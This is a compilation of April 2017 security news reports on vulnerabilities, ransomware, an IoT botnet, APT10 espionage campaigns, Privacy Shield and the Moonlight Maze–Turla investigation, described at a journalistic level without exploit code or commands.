The update released Apple for the Apple Music application for Android fixes a certificate validation issue that can be exploited by an attacker to run MitM attacks and intercept user data.
The Apple Music for Android version 2.0 also implements new features and fixes the above vulnerability tracked as CVE-2017-2387.
According to Google Play, the version 2.0 of Apple Music for Android has between 10 and 50 million installs.
The flaw CVE-2017-2387 was discovered by David Coomber of Info-Sec.CA in August 2016. The vulnerability was affecting Apple Music 1.2.1 and earlier versions of the Android app.
“The Apple Music Android application (version 1.2.1 and below), does not validate the SSL certificates it receives when connecting to the mobile application login and payment servers.” reads the security advisory published by Coomber.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently. Sensitive information could be captured by an attacker without the user’s knowledge.”
According to the expert, the app did not validate the SSL certificates presented while connecting to the login and payment servers. The attacker can present a forged SSL certificate that will be accepted by the application without raising any alert.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user’s knowledge.”
Unfortunately, such kind of issues is quite common for mobile applications and represent a serious threat to the user privacy.
Philadelphia Ransomware, a new threat targets the Healthcare Industry
7.4.2017 securityaffairs Virus
“Philadelphia” Ransomware Targets Healthcare Industry
Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.
The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.
Last month the popular expert Brian Krebs discovered on YouTube an ad Philadelphia.
According to the researchers, thePhiladelphia ransomware is distributed via spear-phishing emails sent to the hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.
The file includes three document icons apparently related to patient information, and attempt to trick victims to click on them.
If the victims click on the icon, a Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.
This tactic was already used to infect a hospital from Oregon and Southwest Washington.
“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.
“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”
“three document icons pertaining to patient information are present in the file. These icons all point to a malicious JavaScript” “Once the user double-clicks any of the icons, the Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.”
Once the ransomware infected the system it contacts the C&C server and sends various details on the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.
The Philadelphia ransomware used AES-256 to encrypt the files, when the operation is completed it displays a request for 0.3 Bitcoins ransom to the victims.
The analysis of the malicious code revealed a couple of interesting things:
the encrypted JavaScript contained a string “hospitalspam” in its directory path.
the ransomware C&C also contained “hospital/spam” in its path.
The presence of the words suggests the attackers are specifically targeting hospitals using spear phishing emails.
“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,”
IoT Amnesia Botnet puts at risk hundreds of thousands of DVRs due to unpatched flaw
7.4.2017 securityaffairs IoT
Security experts at Palo Alto Networks have discovered a new Linux/IoT botnet dubbed Amnesia botnet that has been targeting digital video recorders (DVRs).
Amnesia exploited an unpatched remote code execution vulnerability that was disclosed more than one year ago by security researcher Rotem Kerner.
“fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes, which is the heart component of any CCTV system. This was allowing them to achieve two goals at once-
Verify a targeted host actually belongs to a retailer.
Get a foothold inside the local network, one step closer to the POS station.
” wrote Kerner.
Kerner reported the flaw in March 2016, but after a year opted to publicly reveal his discovery because the vendor ignored him.
According to Palo Alto Networks, the Amnesia is a variant of the Tsunami botnet that is a downloader/IRC Bot backdoor used in the criminal ecosystem to launch DDoS attacks. The Amnesia botnet targets embedded systems, particularly DVRs manufactured by the Chinese TVT Digital that is currently sold under more than 70 brands worldwide.
The security vulnerability discovered by the researcher is still unpatched and according to the results of an Internet scan conducted by Palo Alto Networks, there are roughly 227,000 vulnerable DVR devices in worldwide.
“Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.” states the analysis published by PaloAlto Networks.
The Amnesia botnet was built exploiting the remote code execution vulnerability that allowed the attackers to take complete control of the devices.
A different analysis conducted with the Censys search engine revealed more than 700,000 IP addresses.
“Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP addresses respectively.” states PaloAlto Networks.
1. Taiwan 47170
2. United States 44179
3. Israel 23355
4. Turkey 11780
5. India 9796
6. Malaysia 9178
7. Mexico 7868
8. Italy 7439
9. Vietnam 6736
10. United Kingdom 4402
11. Russia 3571
12. Hungary 3529
13. France 3165
14. Bulgaria 3040
15. Romania 2783
16. Colombia 2616
17. Egypt 2541
18. Canada 2491
19. Iran 1965
20. Argentina 1748
Experts believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to elude malware analysis sandboxes.
“Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system.” continues the analysis. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”
Experts at PaloAlto believe the Amnesia botnet has the potential to become one of the major botnets in the threat landscape and would be used for large-scale attacks.
For further information on Amnesia give a look at the technical report that also includes IoCs.
Critical Vulnerabilities Patched in QNAP Storage Devices
7.4.2017 securityweek Vulnerebility
QNAP recently patched roughly 20 vulnerabilities in its network-attached storage (NAS) products, including weaknesses that can be exploited to take control of affected devices.
According to an advisory published by the vendor last month, the flaws were patched with the release of version 4.2.4 build 20170313 of QTS, the operating system running on QNAP NAS devices.
The update patches privilege escalation, command injection, SQL injection, cross-site scripting (XSS), clickjacking, credentials management, access bypass and various memory corruption vulnerabilities.
Three of the command injection flaws were reported to QNAP by Harry Sintonen of F-Secure, who on Thursday published an advisory detailing his findings. The expert said he informed the vendor of the vulnerabilities in late February.
The security holes discovered by Sintonen, tracked as CVE-2017-6361, CVE-2017-6360 and CVE-2017-6359, can be exploited by authenticated or unauthenticated attackers to execute arbitrary commands on vulnerable devices. Exploitation of the unauthenticated command injection flaws can be automated in attacks aimed at devices that are connected to the Internet.
According to Sintonen, the flaws allow an attacker to gain root access to a device and read or modify all the data stored on it.
Researchers Pasquale Fiorillo and Guido Oricchio also published an advisory detailing a privilege escalation vulnerability (CVE-2017-5227) that was patched with the release of QTS 4.2.4.
The experts discovered that a local user can access a configuration file that contains a poorly encrypted Windows domain administrator password. The password is stored in the configuration file if the NAS device has joined an Active Directory domain, researchers said.
A couple of researchers from Salesforce have also been credited for finding security holes patched in QTS 4.2.4. The flaws found by Fiorillo, Oricchio and Sintonen are the only ones that have been assigned CVE identifiers.
It’s important that users install the update as soon as possible since malware that specifically targets QNAP devices is not unheard of. A few years ago, researchers warned that a worm had been exploiting the ShellShock vulnerability to plant backdoors on NAS devices from QNAP.
China-Linked Hackers Target U.S. Trade Group
7.4.2017 securityweek Cyber
A threat actor linked to China hijacked the website of a prominent U.S. trade association in an effort to deliver reconnaissance malware to individuals who accessed certain web pages.
Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.
The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Experts believe the attack ended by March 2, when links injected into the NFTC website had been removed.
Evidence uncovered by investigators led them to believe that the attack was conducted by a China-linked cyber espionage group known as APT10, MenuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.
According to researchers, the hackers set up certain web pages of the NFTC website to serve a reconnaissance framework known as Scanbox. The tool has been used for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.
Scanbox has various plugins that allow attackers to collect information about the infected system and the software installed on it, and log keystrokes from the web browser. The harvested data can then be used to launch further attacks against the targeted individuals.
In the case of the NFTC, whose board of directors includes some of the largest private sector companies in the United States, APT10 targeted only specific web pages. One of them was a registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting had been targeted.
“All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.”
The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.
Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.
The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.
European Parliament Slams Privacy Shield
7.4.2017 securityweek Privacy
The European Parliament on Thursday adopted a resolution (PDF) strongly criticizing the EU-US Privacy Shield. Privacy Shield is the mechanism jointly developed by the European Commission and the US government to replace the earlier Safe Harbor, struck down by the European Court of Justice in 2015. Its purpose is to allow the transfer of EU personal information from Europe to servers in the US.
European law requires that personal information can only be transferred to geographical locations with an equivalent or 'adequate' level of privacy protection. With very different attitudes towards privacy between the US and the EU, it is unlikely that US data protection will ever be considered adequate for EU data. Privacy Shield is designed to provide an agreement between individual US organizations and the EU that they will handle EU data in a manner acceptable to European standards.
Although Privacy Shield has been agreed between the EC and the US and is already in operation it is not without its critics-- not the least of which is the European Parliament. The stakes are high. While this is not the only legal mechanism for the export of European data to the US, it is the primary one. Others include standard contractual clauses (SCCs); but SCCs are already being challenged by Max Schrems in the Irish High Court. Without an acceptable lawful mechanism, there can be no trade between the US and the EU.
It is generally considered that SCCs will eventually be declared unlawful. "There is the ongoing case in Ireland regarding Standard Contractual Clauses," European privacy consultant Alexander Hanff told SecurityWeek. "This is likely to reach the CJEU and be ruled on in a similar fashion to Safe Harbor which, although will not have a direct impact on Privacy Shield, quite clearly shows the result similar cases (including Binding Corporate Rules and Privacy Shield itself) are likely to achieve."
There is therefore a lot riding on the continuing legality of Privacy Shield. For the moment, this is not as immediately concerning as it may seem. "The EP resolution follows the statement earlier this week from the Commission indicating a review in the Fall," comments David Flint, a senior partner at the MacRoberts law firm. "At this stage, it is merely a reminder of all the matters that the Commission should take account of and noting the residual powers of national DPAs to ban transfers, whilst restating the EP's concerns."
Hanff agrees that there will be little immediate outcome from this resolution. "I am pretty sure that the Commission can ignore the motion and are likely to do so because frankly what other choice do they have at the moment -- if they agree to it, then they are basically accepting that they failed, and the Commission are really not that humble." Politically, he sees a rift in the current Commission between those focused on digital rights and those focused on the Digital Economy; with the latter in the ascendency.
This doesn't mean that there is not a problem. Individual national data protection authorities (DPAs) "do have the power to effectively shut down Privacy Shield by banning transfers based on it on the grounds that it does not meet adequacy requirements," continued Hanff. "They have not done so to date -- I suspect because they have been giving the Commission and the US Government a chance to fix it -- but it seems highly unlikely that that will ever happen."
Hanff notes that there is little actual progress on the Privacy Shield agreement from the US side. "When you consider there is still no Ombudsman and that the Privacy and Civil Liberties Oversight Board is reduced to a non-quorate position where only one of its five seats are currently occupied... even if you completely ignore the woeful inadequacies of the agreement, you cannot ignore that some of the major assurances of that agreement have quite simply not been met. I suspect it is only a matter of time now before one or more of the EU's DPAs makes a stand." The French authority, CNIL, has demonstrated that it would not be afraid to do so, with recent actions against both Google and Microsoft.
One further complication is a hardening of attitudes with the arrival of the Trump administration. "There is no detailed consideration of possible changes as a result of the new US administration, although that remains a significant concern," comments Flint. "The recent policy changes on net neutrality and ISP data sharing exacerbate the concern."
Hanff is more forthright. "One should also be asking questions with regards to the Trump administration and US Congress wiping out ISP privacy rules last week. One must understand that whereas many people focus on the transference of data to a third country when they discuss Privacy Shield (in the case of Privacy Shield, specifically the US) it is not just about the right to transfer; it stems from the right to process - so we must now consider whether a European Citizen visiting the US and using a US carrier for data and voice, have their rights undermined by these recent changes. The obvious answer is yes; however, how we deal with that is much less obvious."
The European Commission is caught in a modern Morten's Fork of its own making. It was instrumental in developing European data protection laws (for human rights reasons), but doesn't wish to abide by them (for economic reasons). Much will hinge on the EC-US talks in the Fall; but today's European Parliament resolution has indicated to the EC what it expects.
If there is no significant move by the US administration to satisfy European concerns, then a rapid legal challenge to the Privacy Shield can be expected. But it should also be noted that the national DPAs do not have to wait for a legal judgment before taking action. The Schrems case that brought down the original Safe Harbor also made it clear that DPAs cannot be bound by EC promulgations. They have, as Hanff notes, "the power to effectively shut down Privacy Shield by banning transfers based on it, on the grounds that it does not meet adequacy requirements."
IoT Botnet "Amnesia" Hijacks DVRs via Unpatched Flaw
7.4.2017 securityweek IoT
A new Linux/IoT botnet named “Amnesia” has been targeting digital video recorders (DVRs) by exploiting an unpatched remote code execution vulnerability disclosed more than one year ago.
The threat, believed to be a variant of the Tsunami botnet, has been analyzed in detail by researchers at Palo Alto Networks. The botnet targets embedded systems, particularly DVRs made by China-based TVT Digital, which are sold under more than 70 brands worldwide.
The vulnerability exploited by the Amnesia malware was disclosed in March 2016 by researcher Rotem Kerner. The expert decided to make his findings public after the vendor ignored his attempts to report the flaw.
The security hole likely remains unpatched and an Internet scan conducted by Palo Alto Networks shows that there are roughly 227,000 vulnerable DVRs in the United States, Taiwan, India, Israel, Turkey, Malaysia and many other countries. A different search carried out via the Censys.io project revealed more than 700,000 IP addresses.
Amnesia has exploited the remote code execution flaw to identify vulnerable DVRs and take complete control of the devices.
Several IoT botnets emerged over the past months, including the notorious Mirai and Remaiten, which also includes capabilities borrowed from Tsunami.
What makes Amnesia interesting is the fact that it has virtual machine (VM) evasion capabilities – experts say this is the first Linux malware that attempts to evade sandboxes.
It’s not uncommon for Windows and Android malware to evade VMs, but such evasion techniques have not been seen in Linux malware.
“Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system,” explained Palo Alto Networks researchers. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”
While Amnesia has yet to be used for large-scale attacks, experts believe it does have the potential to become a major botnet that can cause significant damage.
Flaw in Apple Music for Android Exposes User Data
7.4.2017 securityweek Apple
An update released this week by Apple for the Apple Music application for Android addresses a certificate validation issue that can be exploited to intercept potentially sensitive data.
In addition to a new design and new features, version 2.0 of Apple Music for Android, which according to Google Play has between 10 and 50 million installs, patches a vulnerability that can allow a man-in-the-middle (MitM) attacker to obtain user information.
The vulnerability, tracked as CVE-2017-2387, was reported to Apple by David Coomber of Info-Sec.CA back in August 2016. At the time, the researcher determined that the flaw had affected Apple Music 1.2.1 and earlier versions of the Android app.
In an advisory published this week, Coomber said he asked Apple for a status update in January, and the company said it had still been working on addressing the security hole.
The problem, according to the researcher, was that the app did not validate the SSL certificates received when connecting to the login and payment servers.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user's knowledge.”
It’s worth noting that this appears to be the first security advisory released by Apple for the Music app. The Android application was introduced in November 2015.
Američané chtějí rozšířit zákaz notebooků na palubě letadel
7.4.2017 SecurityWorld Zabezpečení
Zákaz vnášení notebooků na palubu letadel potrvá a už brzy může zasáhnout další letiště.
Američané mohou rozšířit svůj nedávný zákaz vnášení notebooků a další elektroniky na palubu letadel. Ten se od minulého měsíce vztahuje na deset letišť v převážně muslimských zemích.
„Nemusí to trvat až tak dlouho, kdy tato opatření rozšíříme,“ pronesl v Kongresu John Kelly, sekretář Národní bezpečnostní rady.
Zákaz cestujícím z daných letišť zakazuje vnášet na palubu jakékoliv elektronické zařízení větší než mobilní telefon a ta tak musejí být převážena v zavazadlovém prostoru. Jako důvod tohoto opatření americká vláda uvádí snížení rizika teroristického útoku. Podle zpravodajských služeb totiž teroristé z ISIS a dalších skupin vyvíjejí bomby, které lze zabudovat do elektronických zařízení tak, že oklamou letištní bezpečnost. Konkrétnější ohledně těchto technologií Kelly nebyl, ujistil však, že teroristická hrozba je „skutečná“.
„Skupin, které uvažují o útoku na letecký průmysl, jsou tucty.“ Po USA k obdobnému zákazu přistoupila také Velká Británie, další zemí, která tento krok v současnosti zvažuje, je Kanada.
Kritici se však ptají, proč zákaz platí jen pro některé země. A upozorňují i na rozdílnou míru zabezpečení jednotlivých letišť. Například ta ve Spojených státech jsou totiž vybavena mnohem pokročilejším rentgenovým systémem než jinde ve světě.
Všichni se však shodují, že výbušné zařízení v notebooku umístěném v zavazadlovém prostoru může být obtížnější odpálit a také z těchto míst teoreticky snižuje výši napáchaných škod.
„Na palubě ho může umístit a odpálit kdekoliv chce,“ říká Jeffrey Price, odborník na leteckou bezpečnost z denverské univerzity. I navzdory plánovanému vládnímu rozšíření a trvání zákazu do doby „než hrozba pomine“, ale podle Price takový zákaz nemůže trvat věčně a země, na které se vztahuje, by měly situaci umět vyřešit jinak.
Třeba právě modernizací a celkovým zlepšením svých bezpečnostních opatření už na letištích.
Apache Struts 2 vulnerability exploited to deliver the Cerber ransomware
7.4.2017 securityaffairs Virus
Cyber criminals exploited the recently patched Apache Struts 2 vulnerability CVE-2017-5638 in the wild to deliver the Cerber ransomware.
A recently patched Apache Struts 2 vulnerability, tracked as CVE-2017-5638, has been exploited by crooks in the wild to deliver the Cerber ransomware.
The remote code execution vulnerability affected the Jakarta-based file upload Multipart parser under Apache Struts 2. The CVE-2017-5638 flaw was documented in Rapid7’s Metasploit Framework GitHub site and researchers at Cisco Talos discovered that attackers in the wild are exploiting a publicly available PoC code that triggers the issue.
The attackers targeted both Unix and Windows systems to establish backdoor or to infect the system with a DDoS trojan. The recent campaign spotted by researchers at F5 Networks targeted Windows machines.
Since March 20, the experts observed attacks delivering Cerber ransomware to Windows servers.
“This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit.” reads the blog post published by F5 Networks.
“The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.”
“Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE 2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots.” states an analysis published by experts at the SANS Technology Institute. “But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.”
Crooks exploited the CVE-2017-5638 vulnerability to run Windows tools like shell commands and ITSAdmin to download and execute the Cerber malware.
Below the attack sequence observed by the researchers at the SANS Institute:
The script uses BITSAdmin to download the malware (I obfuscated the URL above.
The malware (“UnInstall.exe”) is saved in the %TEMP% directory
finally, the malware is executed.
The experts at F5 Network analyzed the Bitcoin address where victims are told to send the payment of the ransom and discovered that 84 bitcoins, roughly $100,000 at the current market value.
“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”
Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs APT
Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper known to be targeting managed service providers (MSPs) worldwide. Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.
The expert gathered evidence that suggests the involvement of the APT10 group and domain registration timing indicates operation were conducted with a China’s time zone.
The attackers used same malware exploited in other attacks attributed to APT10, the Poison Ivy RAT and PlugX malware are the most popular malicious codes in the arsenal of the crew. Experts noticed the group from around mid-2016 started to use once again PlugX, ChChes, Quasar and RedLeaves.
“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”
The Operation Cloud Hopper campaign leveraged on well-researched spear-phishing messages aimed to compromise MSPs.
The hackers used this tactic to obtain legitimate credentials to access the client networks of MPSs and exfiltrate sensitive data.
The attackers aimed to compromise the supply chain to steal intellectual property from the victims.
“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013″ continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”
The Operation Cloud Hopper demonstrates that the APT10 focuses on cyber espionage activity, targeting intellectual property. The author of the report confirmed the APT10 has exfiltrated a high volume of data from multiple victims, exploiting compromised MSP networks.
Penquin’s Moonlit Maze
6.4.2017 Kaspersky CyberSpy
Back to the Future – SAS 2016
As Thomas Rid left the SAS 2016 stage, he left us with a claim that turned the heads of the elite researchers who filled the detective-themed Tenerife conference hall. His investigation had turned up multiple sources involved in the original investigation into the historic Moonlight Maze cyberespionage campaign who claimed that the threat actor had evolved into the modern day Turla. What would this all mean?
The Titans of Old
Moonlight Maze is the stuff of cyberespionage legend. In 1996, in the infancy of the Internet, someone was rummaging through military, research, and university networks primarily in the United States, stealing sensitive information on a massive scale. Victims included the Pentagon, NASA, and the Department of Energy, to name a very limited few. The scale of the theft was literally monumental, as investigators claimed that a printout of the stolen materials would stand three times taller than the Washington Monument.
To say that this historic threat actor is directly related to the modern day Turla would elevate an already formidable modern day attacker to another league altogether. Turla is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of hijacked satellite connections, waterholing of government websites, covert channel backdoors, rootkits, and deception tactics. Its presumed origins track back to the famous Agent.BTZ, a campaign to spread through military networks through the use of USB keys that took formidable cooperation to purge (in the form of an interagency operation codenamed Buckshot Yankee in 2008). Though mitigating the threat got the most attention at the time, further research down the line saw this toolkit connecting directly to the modern Turla.
Further confirmation came through our own Kurt Baumgartner’s research for Virus Bulletin 2014 when he discovered Agent.BTZ samples that contacted a hijacked satellite IP jumping point, the same that was used by Turla later on. This advanced exfiltration technique is classic Turla and cemented the belief that the Agent.BTZ actor and Turla were one and the same. This would place Turla back as early as 2006-2007. But that’s still a decade ahead of the Moonlight Maze attack.
By 2016 the Internet was over-crowded with well-resourced cyberespionage crews. But twenty years ago there were few players in this game. Few paid attention to cyberespionage. In retrospect, we know that the Equation Group was probably active at this time. A command-and-control registration places Equation in the mid-1990s. That makes Equation the longest running cyberespionage group/toolkit in history. To then claim that Turla, in one form or another, was active for nearly as long, places them in a greater league than their pre-historic counterpart in pioneering state-sponsored cyberespionage.
A Working Hypothesis
By the time of the SAS 2016 presentation, we had already discussed at length how one might go about proving this link. The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes. We would not have to look for older Windows samples where so far there were none, but could instead focus on another discovery. In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s. This all added up to an extremely unusual set of circumstances for malware that was leveraged in attacks in from 2011-2016, with the latest Penquin Sample discovered just a month ago being submitted from a system in Germany.
Kurt Baumgartner’s prescient observation upon the discovery of the first Penquin Turla samples
Our working hypothesis became this: “The Turla developers decided to dust down old code and recompile it for current Windows victims in the hope of getting a stealthier beachhead on systems that are less likely to be monitored.” Were that to be the case, Penquin Turla could be the modern link that tied Turla to Moonlight Maze. But in order to prove our hypothesis and this historic evolution, we’d need a glimpse at the original artefacts, something we had no access to.
The Cupboard Samples
Our last hope was that someone somewhere had kept a set of backups collecting dust in a cupboard that they might be willing to share. Thomas took to the road to follow up his sources and eventually stumbled upon something remarkable. The Moonlight Maze operators were early adopters of a certain degree of operational security, using a series of hacked servers as relays to mask their original location. During the later stages of their campaign, they hacked a Solaris box in the U.K. to use as a relay. Unbeknown to them, the system administrator—in cooperation with the Metropolitan Police in London and the FBI—turned the server against the malicious operators. The machine known as ‘HRTest’ would proceed to log everything the attackers did keystroke-by-keystroke and save each and every binary and archive that transited through it. This was a huge win for the original investigators and provided something close to a six-month window of visibility before the attackers ditched this relay site (curiously, as a result of the campaign’s first publicity in early March 1999). Finding these samples was hard and fortuitous—due to a redaction error in an FBI FOIA release, we were able to ultimately track down David Hedges after about a year of sleuthing. “I hear you’re looking for HRTest,” David said when he finally called Thomas for the first time. Then, the now-retired administrator kicked a machine under his desk, chuckling as he said “well it’s sitting right here, and it’s still working.”
Thomas Rid, David Hedges, Daniel Moore, and Juan Andres Guerrero-Saade at King’s College London
Paydirt but not the Motherlode
What we had in our hands allowed us to recreate a portion of the constellation of attacks that constitutes Moonlight Maze. The samples and logs became our obsession for months. While Juan Andres and Costin at GReAT reversed the binaries (most compiled in SPARC for Solaris and MIPS for IRIX, ancient assembly languages), Daniel Moore went so far as to create an entire UI to parse and load the logs onto, so as to be able to visualize the extent of the networks and nodes under attack. We set out to profile our attackers and understand their methods. Among these, some salient features emerged:
Moore’s Rapyd Graph Data Analyzer tracking the victims of Moonlight Maze linked to HRTest
The attackers were prolific Unix users. They used their skills to script their attack phases, which allowed a sort of old school automation. Rather than have the malware communicate to command-and-control servers and carry out functions and exfiltration of their own accord, the attackers would manually log in to victim nodes and leverage scripts and tasking files (usually located in the /var/tmp/ directory) to instruct all of these nodes on what they should do, what information to collect, and finally on where to send it. This allowed them to orchestrate large swaths of infected machines despite being an ‘operator-at-keyboard’ style of attack.
The operators were learning as they went. Our analysis of the binaries shows a trial and error approach to malware development. Many binaries were simply open-source exploits leveraged as needed. Others were open-source backdoors and sniffers. However, despite not having exact compilation timestamps (as would happen in Windows executables), it’s possible to trace a binary evolution of sorts. The devs would test out new capabilities, then recompile binaries to fix issues and expand functionality as needed. This allowed us to graph a sort of binary tree of development to see how the attacks functionalities developed throughout this campaign.
Despite their early interest in OpSec, and use of tools specifically designed for this effect, the operators made a huge mistake. It was their standard behavior to use infected machines to look for further victims on the same network or to relay onto other networks altogether. In more than a dozen cases, the attackers had infected a machine with a sniffer that collected any activity on the victim machine and then proceeded to use these machines to connect to other victims. That meant that the attackers actually created near complete logs of everything they themselves did on these systems—and once they did their routine exfiltration, those self-logs were saved on the HRTest node for posterity. The attackers created their own digital footprint for perpetuity.
So what’s the verdict?
A complete analysis of the attack artefacts is provided in the whitepaper, for those interested in a look under the hood of a portion of the Moonlight Maze attacks. For those who would like to jump straight to the conclusion: our parallel investigation into the connection between Moonlight Maze and Turla yielded a more nuanced answer predicated upon the limitations in our visibility.
An objective view of the investigation would have to admit that a conclusion is simply premature. The unprecedented public visibility into the Moonlight Maze attack provided by David Hedges is fascinating, but far from complete. It spans a window between 1998-1999 as well as samples apparently compiled as far back as late 1996. On the other hand, the Penquin Turla codebase appears to have been primarily developed from 1999-2004 before being leveraged in more modern attacks. What we are left with is a circumstantial argument that takes into account the binary evolution witnessed from 1998-1999 as well as the functionality and tools leveraged at that time, both of which point us to a development trend that could lead directly to what is now known as Penquin Turla. This includes the use of tasking files, LOKI2 for covert channel communications, and promiscuous sniffers – all of which made it into the modern Penquin Turla variants.
The next step in our ongoing parallel investigation would have to focus on a little known operation codenamed ‘Storm Cloud’. This codename represents the evolved toolkit leveraged by the same Moonlight Maze operators once the initial intrusions became public in 1999. In 2003, the story of Storm Cloud leaked with little fanfare, but a few prescient details led us to believe a more definitive answer may be found in this intrusion set:
Storm Cloud reference in a 2003 Wall Street Journal Article mentions further use of LOKI2
Just as the SAS 2016 talk enabled us to find David and his time capsule of Moonlight Maze artefacts, we hope this glimpse into our ongoing research will bring another dedicated sysadmin out of the woodwork who may still have access to Storm Cloud artefacts, allowing us to settle this question once and for all. Beyond the historical value of this understanding, it would afford greater perspective into a tool being leveraged in cyberespionage attacks to this day.